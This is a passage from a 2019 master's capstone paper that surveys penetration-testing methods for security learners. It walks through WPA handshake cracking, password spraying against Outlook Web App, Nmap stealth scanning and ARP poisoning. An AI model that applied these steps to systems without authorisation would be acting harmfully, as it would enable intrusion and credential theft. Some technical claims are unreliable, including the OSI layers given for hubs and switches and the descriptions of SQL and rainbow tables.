ABSTRACT .com



Penetration Testing MethodologiesbyMathew StuartA Capstone Project Submitted to the Faculty ofUtica CollegeDecember 2019in Partial Fulfillment of the Requirements for the Degree ofMaster of Science in Cybersecurity? Copyright 2019 by Mathew StuartAll Rights ReservedAbstractGiven the rising trend in security breaches among organization’s worldwide, cybersecurity has increasingly become an important role in the public and private industry sectors. In addition, the cybersecurity workforce gap has left many organizations without qualified professionals to secure their data. There is a growing need to educate and employ cybersecurity professionals in both commercial organizations and government. The main barriers to beginning a career in cybersecurity are gaining advanced and relevant knowledge and experience in cybersecurity. Knowledge can be difficult and time consuming to obtain, and training can cost money. Because of the barriers to beginning a career in cybersecurity, a single source of information that leads to knowledge and experience in cybersecurity is valuable.The purpose of this research was to develop a cybersecurity penetration testing methodology template for use by aspiring cybersecurity professionals to practice penetration testing and develop a personalized methodology. What are the common penetration testing tools and methods for attacking a network or environment from the Internet? What are the common penetration testing tools and methods for attacking a network or environment from the Intranet? What are the common penetration testing tools and methods for attacking web applications? This research is important because penetration testing experience leads to advanced knowledge in cybersecurity, which is an advantage when beginning a career in cybersecurity. Understanding cybersecurity concepts through a security analysis provides a tester with conceptual knowledge and hands-on experience. Through the process of developing a penetration testing methodology, an aspiring cybersecurity professional will learn about cybersecurity tools, technologies and procedures. Acknowledgments My first acknowledgment is to Professors Krystina Horvath and Anna Ragno for their guidance and assistance throughout this project. Their feedback has been valuable and educational throughout this project. I would also like to thank family, especially my wife and mother, for all their support throughout these past 7 years as I worked and went to school at the same time. If not for their support and encouragement, I may not have reached this point in my education and career. I would also like to thank Utica College for providing the technical and hands-on education that I was searching for. I learned a great deal from every course, and I was able to utilize that knowledge to gain employment in the cybersecurity industry. Lastly, I would like to thank Michael Denny for taking the time to lend his experience and expertise and be the second reader of this paper. Table of Contents TOC \o "2-3" \h \z \t "Heading 1,1" List of Illustrative Materials PAGEREF _Toc27134424 \h viStatement of the Problem PAGEREF _Toc27134425 \h 1Literature Review PAGEREF _Toc27134426 \h 7Introduction to Penetration Testing PAGEREF _Toc27134427 \h 7Intelligence Gathering PAGEREF _Toc27134428 \h 9Wireless Networks PAGEREF _Toc27134429 \h 10Web Application Testing PAGEREF _Toc27134430 \h 14Intranet PAGEREF _Toc27134431 \h 18Scanning and discovery PAGEREF _Toc27134432 \h 18Exploitation and gaining access PAGEREF _Toc27134433 \h 22Persistence and spreading PAGEREF _Toc27134434 \h 25Data gathering and extraction PAGEREF _Toc27134435 \h 29Covering tracks PAGEREF _Toc27134436 \h 31Discussion of the Findings PAGEREF _Toc27134437 \h 32Wireless Tool Benefits PAGEREF _Toc27134438 \h 33Web Application Testing Results PAGEREF _Toc27134439 \h 33Intranet Security Testing Results PAGEREF _Toc27134440 \h 36Commonalities PAGEREF _Toc27134441 \h 44Conclusion PAGEREF _Toc27134442 \h 46References PAGEREF _Toc27134443 \h 49Appendix A PAGEREF _Toc27134444 \h 55Appendix B PAGEREF _Toc27134445 \h 57List of Illustrative Materials TOC \h \z \t "Caption,1" \c "Figure" Figure 7. Nikto Command and Output From a Generic Scan PAGEREF _Toc27134407 \h 34Figure 8. ZAP Automated Scan Configuration Screen PAGEREF _Toc27134408 \h 35Figure 9. ZAP Automated Scan Results PAGEREF _Toc27134409 \h 35Figure 10. Nmap device enumeration command PAGEREF _Toc27134410 \h 37Figure 11. How to Start a Scan in OpenVAS PAGEREF _Toc27134411 \h 38Figure 12. Results From OpenVAS Scan PAGEREF _Toc27134412 \h 39Figure 13 - Enum4linux LDAP Output PAGEREF _Toc27134413 \h 40Figure 14. Enum4linux Users Output PAGEREF _Toc27134414 \h 41Figure 15. Enum4linux Password Policy Output PAGEREF _Toc27134415 \h 42Table 1 - Example of Basic Nmap Command Options PAGEREF _Toc27134416 \h 55Table 2 - Nmap Stealth Scanning Options PAGEREF _Toc27134417 \h 55Figure 1. Nikto Options 1 PAGEREF _Toc27134418 \h 57Figure 2. Nikto Options 2 PAGEREF _Toc27134419 \h 58Figure 3. ARP Poisoning Before and After PAGEREF _Toc27134420 \h 59Figure 4. Enum4Linux Help Page Output PAGEREF _Toc27134421 \h 60Figure 5. Syntax for Metasaploit PAGEREF _Toc27134422 \h 61Figure 6. Spear Phishing Model: Targeted Cyber Attack PAGEREF _Toc27134423 \h 62Statement of the ProblemPenetration Testing MethodologiesIn the realm of cybersecurity, there are two main roles; red team and blue team. Blue teams are the teams of cybersecurity professionals who defend an environment from compromise. In the event of a compromise, the blue team responds to those incidences for the purposes of both minimizing the degree of compromise and gaining knowledge regarding the attack. Blue teams also use data gathered about an attacker for investigations by either their organization and/or law enforcement. A red team is a team of cybersecurity professionals whose purpose is to attack an organization’s environment for the purpose of authorized security testing, audit and analysis. Red teams only perform offensive actions at the request of those who they are testing, therefore, offensive testing is always agreed upon beforehand, with strict rules for the teams to follow. These rules include a list of acceptable and unacceptable actions, and the scope in which the attack will be conducted CITATION NIS19 \l 1033 (NIST, 2019).A blue team member or member on the defensive side of cybersecurity needs to know more than just how to utilize tools to defend a network. A well-rounded security professional also needs to understand how to perform offensive operations. It is imperative that cybersecurity professionals understand how an attacker can penetrate an environment, which will inform the cybersecurity professional how to defend against these types of attacks CITATION NIS191 \l 1033 (NIST, 2019). Penetration testing (Pentesting) can help test the blue team’s incident response skills and methods. A penetration test also helps a blue team identify an organization’s vulnerabilities, and allows the blue team to make modifications to systems and processes. The process of penetration testing also promotes a proactive approach to blue teaming. If a blue team knows that an environment will be the target of a pentest, they are likely to perform their own ad-hoc penetration test to identify and remediate vulnerabilities ahead of time. This is often the case when penetration tests are required for regulation and compliance purposes (Sanabria, 2018). According to the Offensive Security organization, offense is the best defense. The only way to be confident that risk mitigation strategies protecting a company against cyber-attacks will be effective is through simulation, or pro-actively testing security measures before a real intruder does. By encouraging students to put themselves in the shoes of a hacker by utilizing the same tools and techniques, Offensive Security is leveling the playing field for defenders (Offensive Security, 2019). In order to secure an environment, it is critical that a cybersecurity professional understand how a potential attacker would attempt to penetrate an organization’s environment. The need for offensive security knowledge grows as the number of successful cyber-attacks increase each year. The number of successful security breaches in the U.S. for 2016 was 1,091, which was 40% more than the 780 breaches in 2015. Similarly, there were 1,579 data breaches in the United States in 2017, which was a 44.7% increase from 2016 (Identity Theft Resource Center, 2018). The shock of data breach frequency is compounded by the average cost of a data breach in the United States. IBM’s report on data breaches states that the average cost of a data breach in the United States is $8.19 million per breach (IBM, 2019). With the risk of an organization losing millions of dollars, and the possibility of millions more in lost revenue due to a damaged reputation as the result of a data breach, organizations are on the lookout for qualified cybersecurity professionals to protect their environments. There is currently a severe shortage of qualified cybersecurity professionals worldwide. A study conducted by Cybersecurity Ventures states “A 2016 skills gap analysis from ISACA estimated a global shortage of 2 million cybersecurity professionals by 2019 (a half-million more than Symantec’s prior estimate), according to the United Kingdom House of Lords Digital Skills Committee” (Morgan, 2017). In the United States, there was a shortage of about 314,000 cybersecurity professionals as of January 2019 (Crumpler & Lewis, 2019). The data breach frequency, costs to an organization per data breach, and the large cybersecurity professional’s workforce gap all outline the need for more cybersecurity professionals. An increase in cybersecurity professionals to fill the workforce gap will also increase the security posture of organizations in the United States and around the world.One of the questions regarding the cybersecurity professional’s workforce gap is why the gap exists in the first place. The International Information Systems Security Certification Consortium, also known as ISC2, performed a study in 2018 regarding the mentioned workforce gap and it showed that “Despite [cybersecurity] professionals looking to shift priorities, as well as other concerns and challenges, 68% of respondents say they are somewhat or very satisfied with their jobs” (International Information Systems Security Certification Consortium, 2018).With most cybersecurity professionals satisfied with their jobs, the question remains as to why more people are not filling the workforce gap. The International Information Systems Security Certification Consortium (ISC2) also investigated this issue. According to ISC2’s survey, 34% of people surveyed do not know which career path opportunities lead to a role in cybersecurity, 32% of organizations do not know about cybersecurity skills, and the same percentage of people surveyed cannot afford certification training and/or the certifications themselves. Twenty-eight percent of people surveyed cannot afford the formal education to prepare them for a career in cybersecurity, and 26% of people surveyed said they do not have enough experience in cybersecurity to get a job in the industry. This is a problem because 49% of organizations surveyed in the same survey stated that the most important qualification for employment is relevant cybersecurity work experience, while 40% of organizations stated that extensive cybersecurity work experience is the most important qualification for employment (International Information Systems Security Certification Consortium, 2018). It is difficult to begin working in the cybersecurity industry if one does not have prior cybersecurity experience.Between the time it takes to learn cybersecurity skills, the costs of training, and the requirement for prior cybersecurity experience, it is not surprising that there is such a large workforce gap. The lack of quality, open-source training materials that cover the steps needed to learn cybersecurity, specifically offensive security, is the main issue. Offensive security is so important because the previously mentioned ISC2 survey reported that 47% of organizations named advanced cybersecurity concepts as the most important qualification for employment. Another 40% believe relevant cybersecurity experience is the most important factor for employment, meaning that 87% of organizations require prior experience for employment (International Information Systems Security Certification Consortium, 2018). Offensive security knowledge falls under advanced cybersecurity concepts and relevant cybersecurity knowledge, making penetration testing and red team skills the most coveted skill set. Gaining knowledge and experience in the cybersecurity field can occur at home during a person’s spare time. There are ways of creating home cybersecurity testing labs that allow a person to test and practice what they learn. In one example, a cybersecurity student, Vitaly Ford, posted instructions on how to create such a lab environment using virtual machines. Ford’s blog post also provides links to resources like virtual machine images that can easily be used with virtual machine hosting software, also known as a hypervisor. An example of a hypervisor is VirtualBox. Ford’s directions on first steps are to: learn how to install a virtual machine (and a hypervisor), which is typically performed in Microsoft Hyper-V, Oracle VirtualBox, or VMWare Workstation/Fusion. In addition, one can begin thinking about developing a networking diagram that will help a pentester stay on track once the pentester installs virtual machines and connects them together (Ford, 2017). Ford’s steps are one option, among several, to gain hand-on experience and cybersecurity knowledge. Hands-on penetration testing experience is possible through the utilization of penetration testing environments provided by the hosts of hackthebox.eu. If a user can gain credentials and create an account in hackthebox.eu, that user is able to utilize the OpenVPN config file for their Hack the Box account, which accesses a testing network. This would allow the user to perform attacks against pre-setup machines in the environment and, thus, test what was learned in regard to penetration testing. “Hack the Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field” (Hack the Box, 2019). The pre-setup machines in Hack the Box’s environment range in difficulty gaining user and root credentials. Once a tester gains one or both credentials, they submit the credentials to Hack the Box, who gives points for correct credentials. Practicing penetration testing with the easier machines is often a good start and a great learning experience. This paper addresses the lack of penetration testing methodology templates that beginners in the field of cybersecurity should utilize to develop a personalized penetration testing method that works best for them. There is a lack of cybersecurity learning materials available for new professionals that overview how to use different tools and how to utilize tools at each step of a penetration test. In search of advanced cybersecurity conceptual knowledge, the main barriers to entering the cybersecurity field are time, money and a lack of cybersecurity experience. A penetration testing template would assist an information technology professional gain cybersecurity knowledge and experience.For those with little to no cybersecurity experience, who wish to perform penetration tests, tend to research multiple online sources in order to gain the knowledge they need. Instead, there should be a single template for penetration testing best practices with tool syntax and examples which provide a starting point for beginners to develop their own pentesting methodology.This paper begins the journey of gaining penetration testing knowledge and experience for those who wish to learn how a pentest is performed from beginning to end. It also includes steps on how to discover hosts, find vulnerabilities, exploit example vulnerabilities, maintain persistence on a machine, exfiltrate data and erase evidence of an attack to cover the attacker’s tracks. The mentioned penetration testing steps include syntax for the tools covered in this paper, and best practices on how to use those tools. The purpose of this research is to review different penetration testing methodologies and to discuss the advantages and disadvantages of each methodology in order provide a best practice method for attacking networks. The networks and environments that will be explored are the Intranet, Internet and web applications. This will focus on information at a beginner’s level, thus creating a template that can be used as a baseline for creating a more advanced and personalized methodology as a user’s skills and knowledge increase over time and through practice. In order to provide best practices, the following questions will be answered; what are the common penetration testing tools and methods for attacking a network or environment from the Internet? What are the common penetration testing tools and methods for attacking a network or environment from Intranet? What are the common penetration testing tools and methods for attacking web applications?Literature ReviewIntroduction to Penetration Testing There are three different types of penetration tests, Black Box, White Box, and Grey Box. The type of penetration test that is performed depends on the amount of information is provided to the tester before testing begins. Black Box testing is conducted when the tester is given no information about an organization’s network or code. White Box testing is when the tester is given full knowledge of an orgaization’s network or source code. Grey Box testing is a combination of White and Black Box testing, meaning that the tester has a limited knowledge of the network or source code (Khan & Khan, 2012). The seven main phases of a penetration test are as follows:?Discovery?Enumeration/Info Gathering?Exploitation?Privilege escalation?Persistence/Maintaining Access?Covering Tracks?Documentation/Reporting (Ali, Allen, & Heriyanto, 2014, pp. 60-66). In the book Advanced Penetration Testing for Highly-Secured Environments (2016), the authors explain the Penetration Testing Execution Standard (PTES) and outline the standard’s structure. The seven sections of the PTES are pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. The PTES explanation does not include a technical guide for the standard, but it does reference the URL , which is a technical guide for the PTES. In the PTES technical guideline, the steps are broken down into smaller steps with technical information, but the core of the guideline is the same as the guideline found in Advanced Penetration Testing for Highly-Secured Environments (2016) (Allen & Cardwell, 2016, p. 11).Standards in penetration testing are often vague, general and procedural in nature, as opposed to being technical, which provides specific details. A commonality throughout penetration testing is the use of tools and toolsets to perform those tests. Open-source tools are most often used to perform penetration tests. Penetration testers use stand-alone tools and toolsets. These toolsets are chosen by their effectiveness and the tester’s familiarity with the tool. If the tester is not familiar with their tools, the test will not be effective. There are many open-source and paid tools, but testers need to choose their toolsets to fit the needs of the test. As an example, in an application security test, Aircrack-ng would not normally be necessary because Aircrack-ng was made for wireless network testing and the test is performed on a software’s security and not the security of the network. The same could be said if the situation was reversed where a static code analyzer would not be required for a network penetration test. Ensuring the toolset matches the test and the penetration tester is familiar with their toolset is easily the most important aspect of a penetration test (Velu, 2017, pp. 201-206). Intelligence GatheringThe discovery phase begins with intelligence gathering and the discovery of devices that could be compromised. The three intelligence gathering methodologies are open source intelligence (OSINT), cyber intelligence (CYBINT) and human intelligence (HUMINT). Cyber intelligence involves finding information about the target on the Internet, which is a subset of open source intelligence. This means finding intelligence via an open source tool or platform. Another intelligence gathering location is online social networks (OSNs). OSNs are part of CYBINT, and for good reason as OSNs commonly have a wealth of data on individuals within a company and on the organization itself (Sood & Enbody, 2014, pp. 23-34).Human intelligence occurs when an attacker acquires information about the target by analyzing responses from people through direct interaction. This can include phishing emails or physically posing as someone else to trick the target into providing the attacker information. These practices are also known as social engineering (Sood & Enbody, 2014).Social media has changed open source intelligence in a profound way. Through OSN, intelligence on both individuals and organizations is discoverable through social media accounts such as Facebook, YouTube, Instagram, Snapchat, and Twitter. When reviewing the target’s social media posts, it is possible to gather the target’s location during certain times of day, friend lists, liked pages, and group associations. The information gathered during OSN provides the attacker with an overview of what the target likes and what kind of information they are most receptive to. This can give an attacker the information needed to manipulate a user through social engineering as part of an attack against the specific user or an organization (Bahybars-Hawks, 2015, pp. 155-172).OSINT also includes discovering publicly facing devices of a target organization. This could include website, Internet accessible servers and/or Internet accessible networking equipment. Target discovery phase mostly entails identifying the status of a target’s network, operating system (OS), and mapping out the organization’s information technology infrastructure. This provides the penetration tester with a better understanding of the technologies or devices used within an organization and may further help the tester in enumerating services. By utilizing tools in Kali Linux, the tester can determine what hosts are live on a network, which operating systems are running on the local hosts, and will be able to characterize each device according to its role. The tools in Kali Linux often utilize active and passive detection techniques in addition to network protocols where they can be manipulated in various ways to gather information from the OS and running services (Ali, Allen, & Heriyanto, 2014, pp. 82-83). There are several sources for gaining syntax for certain tools. Online cheat sheets and user guides are a great way to gain a basic understanding of a tool’s syntax and uses. Wireless NetworksWhen a penetration test involves compromising a wireless network, it can end up being the key to compromising an entire company. Some tools and toolsets in Kali Linux are useful when attempting to test a wireless network’s security. Two of the most widely used toolsets are Aircrack-ng and Kismet. Kismet can be used as a wireless detector, sniffer, and intrusion detection system. Kismet can detect and sniff the name of the wireless network along with its broadcast ID (BSSID), the channel it is broadcasting on, the MAC address of the wireless access point (WAP), and the MAC address clients use to connect to the wireless network. Kismet supports some plugins that expand the wireless protocols that can be sniffed (Beggs, 2017, pp. 206-207). It can also sniff the other Institute of Electrical and Electronics Engineers (IEEE) Wi-Fi standards 802.11a, 802.11b, 802.11g, and 802.11n traffic. These different IEEE 802.11 standards are wireless local area network (WLAN) standards that, among other features, denotes the speed and security of wireless traffic. The latest IEEE standard for wireless networks is 802.11ay, which allows a possible 20 gigabits per second download and upload speed (IEEE, 2019).Kismet performs reconnaissance by placing the attacker’s wireless network interface card (WNIC) in promiscuous mode and activating Kismet, which will capture packets transmitted over the air and discover the different SSIDs in the area, along with cell towers for mobile data traveling through the air. The information gathered by Kismet is useful in different ways. For example, knowing the wireless security protocol will allow the attacker to determine the appropriate decryption module in Aircrack-ng to extract authentication information. Knowing the MAC address allows the attacker to attempt to perform different types of attacks. For example, a tester can perform an Omerta attack if the wireless access point (WAP) is an unpatched Aruba WAP. Kismet obtains a variety of information when sniffing the 802.11 standard spectrum (Beggs, 2017, pp. 206-207). “Omerta is an 802.11 DoS tool that sends disassociation frames to all stations on a channel in response to data frames. The Omerta attack is characterized by disassociation frames with a reason code of 0x01” (Aruba Networks, 2019). Authentication information that a wireless network uses allows a security tester to find any weak authentication protocols used, and depending on the protocols, there may be known vulnerabilities and possible exploits. Another well-known open-source wireless security tool is Aircrack-ng. The toolset specializes in wireless security testing and is comprised of an array of tools that can perform most any task required during a wireless security penetration test. The following is a list of each tool in the Aircrack-ng tool suite and their uses:Airbase-ng – used for rogue access point creationAircrack-ng – a cracking and recovery tool for WEP and WPA/WPA2 keys.Airdecap-ng – decryption for WEP and WPA/WPA2 wireless traffic.Airdecloak-ng - Used for bypassing WEP cloaking which is a WEP method for fooling WEP cracking tools.Aireplay-ng – Creates wireless traffic for attacks.Airmon-ng – places the WNIC into promiscuous mode to view all trafficAirodump-ng: Used for 802.11 protocol monitoring and sniffing.Airodump-ng-oui-update: Updates the Organizationally Unique Identifier (OUI) database.Airolib-ng – Maintains a local database of ESSIDs, passphrases and precomputed PMKs to use in crackingAirserv-ng – Sets up a local server to allow other devices to access the wireless networkAirtun-ng – Creates virtual tunnel interfaces.Besside-ng – An automated WEP and WPA attacking tool for cracking all WEP-protected networks that the WNIC can see. It also records all the WPA-handshakes.Easside-ng – Sets up communication via a virtual WEP-protected AP without a WEP-key.Packetforge-ng – Can create fake wireless network packets for other attacks.Tkiptun-ng – Can inject a few frames into a WPA TKIP network with quality of service (QoS) (Fadyushin & Popov, 2016, pp. 154-159).Penetration testers can crack a Wi-Fi protected access 2 (WPA2) key using Airmon-ng to place the interface into promiscuous mode so that the interface can view all packets traveling through the air. The next step is to use Airodump-ng to take that captured data and “dump” it into a table. The Airplay-ng tool forces de-authentication of a wireless client, which forces the target to re-authenticate to the WAP. This allows Airodump-ng to capture the WPA handshake as it travels over the air. Aircrack-ng decrypts and recovers the key, which authenticates the tester to the wireless network (Fadyushin & Popov, 2016, pp. 154-159).Decryption is part of most penetration testing processes. Wireless network handshakes are one example, and captured passwords from compromised machines are examples where decryption is necessary. There are several types of wireless network authentication methods and security protocols. In the password cracking section of the PTES, it mentions how to crack passwords for different wireless security protocols. WPA-PSK can be used to brute-force the password to the SSID. WPA is an acronym for Wi-Fi Protected Access and PSK stands for Pre-Shared Key. In order to accomplish a successful decryption is to use a tool, such as Wireshark or Airodump-ng, the authentication handshake between a client and the WAP must be captured. The next step is to decrypt the authentication handshake, which reveals the password. The Penetration Testing Standard mentions that the Aircrack-ng tool suite is made specifically for this type of task and is a standard in open source tools for cracking wireless authentication encryption (Pentest-Standard, 2012).Regarding password cracking, John the Ripper (JTR) is an open source tool that cracks hashes to reveal passwords. JTR specializes in NTLM hashes but can be used for Kerberos and other operating system hashed passwords such as Linux and Macintosh devices depending on the version of JTR that is running. This tool can be used to decrypt WEP and WPA/WPA2 authentication that was captured over the air during a packet sniff. Hashes are cracked using rainbow tables, which are hashed wordlists, which are then hashed several more times using sophisticated mathematical methods. JTR uses rainbow tables to crack the captured hashes (Fadyushin & Popov, 2016, pp. 154-159).As mentioned previously, another way to attack a wireless network is to pose as the wireless network itself. This is accomplished by performing a modified combination of a man-in-the-middle and phishing attack called AP Phishing.AP phishing, or access point phishing, is an attack that involves a rouge access point that contains a web portal, which asks users for sensitive information. If performed correctly, the users will not realize they are being phished. This is assuming they normally enter credentials in a web portal to access the network. This works best when spoofing access points in public areas such as Starbucks. Airpwn-ng, which is part of the Aircrack-ng tool suite, can perform this attack CITATION Fad161 \p 154-159 \l 1033 (Fadyushin & Popov, 2016, pp. 154-159). Web Application TestingReferring to the Open Web Application Security Project (OWASP), the OWASP penetration testing methodologies page of their website list reasons for performing web application penetration tests and references the Penetration Testing Execution Standard (PTES). OWASP also refers to the payment card industry data security standard PCI-DSS compliance requirement for penetration testing and offers some guidance on the framework for compliance testing. There is also a page that outlines the framework for NIST800-115’s Information Systems Security Assessment Framework (ISSAF). Other methodologies outlined are the Open Source Security Testing Methodology Manual (OSSTMM) and the FedRAMP Penetration Test Guidance. This is important for web application penetration testing, as there is always a reason for a test. Regulatory compliance can often be that reason. Understanding the web application penetration testing compliance standards is critical to performing the correct test for the organization (OWASP, 2019).The Zed Attack Proxy (ZAP) was developed by the OWASP as an open-source tool for the sole purpose of finding web application vulnerabilities. The tool has a variety of functions allowing automatic and manual scanning of an application. The OWASP ZAP user guide on Github contains an explanation for the different settings that the ZAP tool offers (Psiinon, 2015).ZAP has multiple scan modes that can be utilized to serve different functions. As an example, safe mode is a setting that tells the tool to refrain from any dangerous scan actions that could hinder the performance of a web application. Protected mode is the next level up from safe mode and allows the scan to perform only potentially dangerous scan actions against the URL in scope. Standard mode is the default mode when a tester installs and opens the tool, and allows the security tester to perform whichever tests they want. Lastly, attack mode tells the tool to scan the URL once discovered, and runs all tests and attacks available against the in-scope URLs (Psiinon, 2015).There are several other tools available to assist a security analyst throughout the process of performing a web application penetration test. One such tool is Nikto, which is an open source web application scanner that looks for URL paths, index pages, HTTP server options, server OS and web hosting software. Because the program looks at URL paths and index pages, not all the information gathered are vulnerabilities. The tool also lacks stealth, so it could also be used to test intrusion detection systems (IDS) and/or intrusion prevention systems (IPS). In Kali Linux, the command ‘nikto -Help’ shows a list of options for scanning, format, display, configuration, authentication, and other features that can be found in Figures 1 and 2. Figures 1 and 2 are in Appendix B (Sullo, 2019).A popular, effective and widely used web application security testing tool is Burp Suite, which is a web application protocol analyzer that allows a user to intercept http and https traffic. The tool allows for security testing by manipulating those captured packets, which contain information about the web application. Intercepting traffic is performed by using the Burp Suite software as a proxy for the attacker’s browser and then activating Burp Suite’s intercept mode so that each http/s packet is displayed in HTML code and is intercepted before it gets to the browser and again before it gets to the website (Sharma, 2017, pp. 63-71).One use case for Burp Suite during security testing is using the captured data for a successful and failed login POST request and using those results in conjunction with the Hydra tool that is used for credential testing. A POST request is sent to the web application when a user inputs information on the website and attempts to submit that information. An example of this would be clicking login after entering a username and password into a website. The process is to take the HTML code from Burp Suite, use it in Hydra while utilizing a username file and password file to test credentials and check if a username and password set is successful in authenticating. This is a faster method than manually testing usernames and passwords in the browser (Sharma, 2017, pp. 63-71).An outlook web application (OWA) is a popular spot to perform password spaying attacks as OWA is often linked to a user’s domain credentials. One of the issues in performing password spraying is password lockouts, which occurs when a password has been entered incorrectly too many times and the account is locked-out. The attacker can no longer try different passwords indefinitely. A workaround for account lockout limitations is to use one strategically chosen password across all the accounts of an organization’s domain, thus allowing more password attempts before locking out the account (Najera-Gutierrez & Ansari, 2018, pp. 149-156).Before performing the password spray, it is important to obtain the username format or email address format of the organization, which is usually performed during OSINT and HUMINT. When choosing the right password for a password spray against an OWA account, it is important for the tester to understand and know common passwords. An example of a commonly used password is the current season and the year, such as Winter2019 (Najera-Gutierrez & Ansari, 2018, pp. 149-156). The ten-character password has uppercase, lowercase and numbers. Most organizations only require the password to be eight characters. In order to perform the attack, the attacker needs to visit the OWA login page to attempt and fail a login while capturing the POST request. The captured request is then forwarded to Burp Suite’s Intruder functionality where the attacker uses the attack type of ‘sniper’ and specifies the type of payload they want to use. The payload is the username or email because that is the only thing that will change during the attack since the same password will be used against all accounts to reduce the risk of account lockouts (Najera-Gutierrez & Ansari, 2018, pp. 149-156).Once a password is input, the attacker must import the list of possible usernames or email addresses that were found and/or generated during OSINT and HUMINT. Once these steps are complete, it is time to launch the attack. In some circumstances, the tester must set Burp Suite to follow URL redirects and process those URL cookies for the attack to be successful. Once the settings and configurations are set, a successful attack can be launched. URL cookies are saved on a user’s browser and contain information regarding the session ID, user ID and other text. Websites use cookies to maintain a session with a browser so that the user doesn’t have to re-authenticate as other URLs are loaded (Najera-Gutierrez & Ansari, 2018, pp. 149-156). Databases use Microsoft’s Structured Query Language (SQL) in support of web applications. SQL is a programming language used for database communication and queries. Because web applications use SQL, the SQLMap tool is included in Kali Linux OS distribution by default and is a popular tool for testing the SQL security in web applications. SQLMap supports several versions of SQL and supports enumeration, fingerprinting, and takeover options when vulnerabilities allow. The specifics regarding what tasks the tool can perform are listed on its official GitHub. The range of options and capabilities that the tool offers makes it a great tool to use during web application security testing and should be included in any penetration tester’s tool suite (Stamparm, 2014).IntranetScanning and discovery. The Internet and Intranet are two different types of networks. The Internet is a computer communications network that connects servers and computers around the world (Marriam-Webster, 2019). An Intranet connects computers and servers within one or several local area networks (LANs) not accessible to the Internet without the use of an Internet connection through an Internet Service Provider (ISP).When a tester has access to a target organization’s Intranet, they generally can establish a network connection to other network connected devices on that organization’s Intranet. Access to an organization’s Intranet can occur in a couple of different ways. One way to get a network connection is to establish a physical connection to the network using an ethernet cable to an ethernet port in the office of the organization. Another way is to get wireless network access through a connection to the wireless access point (Fadyushin & Popov, 2016, pp. 154-159). Once the tester is on the network, discovery of devices on the network and enumeration of those devices are the next steps in performing a penetration test. Reconnaissance, which is part of the preparation phase where the tester gathers as much information as possible about the target before launching an attack. During the reconnaissance phase, the tester will utilize different intelligence to gain more knowledge about the target organization. The phase may also involve internal and/or external network scanning (EC-Council Press, 2017, p. 9).When a tester needs to perform discovery scanning and enumeration on a network, Nmap is the tool of choice. There are little to no open-source tools that match the capabilities that Nmap provides. An example of an Nmap command is; nmap -A -v -O -sC 192.168.0.16 -oG scan.txt. The nmap portion of the command at the beginning initiates the Nmap program. The options, such as -A, -v, -O, and -sC tell Nmap what actions to perform against the IP address or network range. The -oG option is the output where the ‘o’ stands for output and the ‘G’ stands for grep, which places the output in a greppable format, allowing the use of grep to search for keywords within a file. The last portion of the output is scan.txt, which creates the text file with that name where the output is going to go to (Lyon, 2008). Table 1, Found in Appendix A, shows an example list of some basic Nmap options. The mentioned examples only show syntax but not all the ways that the Nmap tool can be used. There are examples out there that show the tool’s true diversity in a variety of scenarios. Depending on what the tester is trying to achieve, there are multiple ways to run Nmap. To perform a basic ping scan of a network or range of IP addresses, the following command can be utilized; nmap -sP -n 10.0.0.1-254 (Lyon, 2008).The -sP portion of the command asks Nmap to ping the IP addresses to determine if the devices are online, and the -n tells Nmap not to attempt domain name resolution. With the small amount of data that Nmap is required to gather during this scan, the scan will be faster. To gather a little more data, a tester can replace -sP with -sT which will tell Nmap to scan the common TCP ports on the devices. This is where port scanning comes into play (Lyon, 2008).Port scanning is critical after initial discovery has been completed. As an example, if a ping scan was performed and only one IP address was found to be online, the next step is to perform enumeration of that device. To determine which ports are open, the -p option is used. If the tester wants to scan the entire range of ports on the device, the option is -p-. Once the tester knows which ports are open, they can Nmap with the -sV option which tells Nmap to determine the version of the services running on those ports. Depending on the version of the running services, there could be known exploitable vulnerabilities. The difficulty with Intranet scanning is the risk of getting caught by IDS and IPS. One basic method to avoid detection is address resolution protocol (ARP) scanning which asks the switch for the ARP table, identifying devices on the local area network while never reaching out to those devices directly. The Nmap option for performing an ARP scan is -PR. There are multiple ways of performing these steps in Nmap, and there are more Nmap options available to assist in discovery and enumeration while remaining stealthy (Lyon, 2008).In order to avoid detection of IDS and IPS on an Intranet, an attacker needs to blend-in with normal traffic. When scanning a network, it is important to limit the frequency of packets sent from the tester’s computer so the scan looks more like normal traffic rather than a scan of the network (Allen & Cardwell, 2016, pp. 331-344). Nmap can limit packet parameters, spoofing source IP address, spoofing MAC address, and changing other packet parameters. Using a combination of the Nmap options in Table 2, found in Appendix A, will assist in stealth scanning (Beggs, 2017, pp. 66-72).Depending on the situation, poisoning the ARP table is a viable option to perform certain attacks that give the penetration tester information that can be utilized to compromise a system or network. The tool, Cain and Abel, can perform ARP poisoning after the pentester has placed their NIC or WNIC in promiscuous mode and obtained a list of the devices from sniffing all the traffic on the network. After obtaining the list of devices, the tester can then determine which host they want to impersonate and is able to filter the sniffing tool to show only that device’s traffic. The Cain and Abel tool performs a man-in-the-middle attack by sending the victim machine an ARP request with the IP address of the default gateway, and then an ARP request to the default gateway with the IP address of the victim machine. At this point, the victim machine thinks the pentester is the default gateway and the default gateway thinks the penetration tester is the victim machine. Cain and Abel will capture the packets and analyze the packets for credentials, PII, and other sensitive information can begin (Sanders, 2017, pp. 28-30). Figure 3, found in Appendix B, shows a graphical representation of an ARP table before and after ARP poisoning. Another popular packet sniffing tool is Wireshark. When trying to sniff a network, it is best to be on a hub network instead of a switched network because a hub operates on the second layer of the OSI model. In turn, it will broadcast all packets through all ports all the time, which makes sniffing a network much easier. A switch operates on the third layer of the OSI model and will only send packets out of the ports based on the IP and MAC addresses in the ARP table. Poisoning the ARP table by initiating a separate independent network connection and spoofing the MAC of the default gateway to the switch will allow a penetration tester to imitate a hub network by forcing all the other devices on the LAN to go through the tester’s computer in order to leave the LAN. When this happens, Wireshark can act as a proxy by routing packets to and from the rest of the Intranet and the victim machines. As Wireshark routes packets, it is also capturing those packets. Just like Cain and Abel, Wireshark can analyze the packets offline for credentials, keys, and any other sensitive information (Ali, Allen, & Heriyanto, 2014, pp. 323-327).Network scanning and device enumeration is key during the early stages of a penetration test and security analysis. When the network has been scanned and devices have been footprinted, vulnerability scanning is an appropriate next step, and there are tools to assist a tester during this stage. The OpenVAS tool is a collection of security tools that perform vulnerability management functions. It was developed for a client-server architecture, where the clients request vulnerability scans from the server that performs the scans. Because OpenVAS is modular, multiple scans can run simultaneously (Ali, Allen, & Heriyanto, 2014, pp. 323-327).During preparation for an attack, reconnaissance is 